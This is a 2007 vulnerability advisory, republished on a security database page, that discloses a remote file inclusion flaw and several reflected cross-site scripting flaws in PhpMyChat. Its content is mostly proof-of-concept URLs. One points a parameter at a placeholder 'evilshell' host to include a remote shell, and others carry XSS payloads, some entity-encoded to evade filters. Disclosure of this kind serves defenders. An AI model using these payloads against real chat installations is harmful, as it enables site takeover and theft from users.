Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:18562
HistoryDec 05, 2007 - 12:00 a.m.

RFI and Multiple XSS in PhpMyChat

2007-12-0500:00:00
vulners.com
23
JSON


Email ; [email protected]

Website: http://phpmychat.sourceforge.net/

Many webhosting companies are offering this version of phpMychat in their cpanel :)

                ----------------------------
                |   Remote File Inclusion:  |
                 ----------------------------


http://localhost/path_to_phpMychat/chat/users_popupL.php3
Parameter = From

POC = http://localhost/path_to_phpMychat/chat/users_popupL.php3?From=http://evilshell




                              ---------------
                  |Multiple XSS |
                              ---------------


a.Vulnerable URL: http://localhost/phpmychat/chat/deluser.php3
Parameter = LIMIT

POC =http://localhost/phpmychat/chat/config/start_page.css.php3?Charset=iso-8859-1&medium=10&FontName= >"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;Successfull%26%23x20;XSS%26%23x20;Test%26%23x20;Here%26quot;)>

b. Vulnerable URL: http://www.localhost/mychat/chat/deluser.php3
Parameter = LIMIT

POC = http://www.localhost/phpmychat/chat/deluser.php3?L=english&Link=&LIMIT=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;Successfull%26%23x20;XSS%26%23x20;Test%26%23x20;Here%26quot;)>&AUTH_USERNAME=&AUTH_PASSWORD=

c. Vulnerable URL: http://www.localhost/phpmychat/chat/edituser.php3

Parameter= Link , still lokking for pOC ;)

d.Vulnerable URL= http://localhost/phpmychat/chat/users_popupL.php3
Parameter = LastCheck

POC = http://localhost/mychat/chat/users_popupL.php3?From=..%2FphpMyChat.php3&L=english&LastCheck= "></STYLE><STYLE>@import"javascript:alert('This%20XSS%20Is%20Xss')";</STYLE>'

e. Vulnerable URL: http://localhost/phpmychat/chat/users_popupL.php3
Parameter = B

POC =http://localhost/phpmychat/chat/users_popupL.php3?From=..%2FphpMyChat.php3&L=english&LastCheck=1196698786&B= >"><script>alert("This%20XSS%20Test%20Successful")</script>

f.Vulnerable URL: http://localhost/phmychat/chat/users_popupL.php3
Parameter =From

POC = http://localhost/phpmychat/chat/users_popupL.php3?From=>"><script>alert("This%20XSS%20Test%20Successful")</script>

g. Vulnerable URL = http://localhost/phpmychat/chat/config/start_page.css.php3

Parameter = FontName
Parameter = medium

h. Vulnerable URL: http://localhost/phpmychat/chat/config/style.css.php3
Parameter = FontName
Parameter = medium

POC = http://localhost/phpmychat//mychat/chat/config/style.css.php3?Charset=iso-8859-1&medium=10&FontName=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;This%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>
Try the second one urself or mail me to have the POC :P

    ~~~~~~~~~~~~~~~~~~greetz to mah friend d3 , icqbomber , baltazar~~~~~~~~~~~~~~~~~~
--
JSON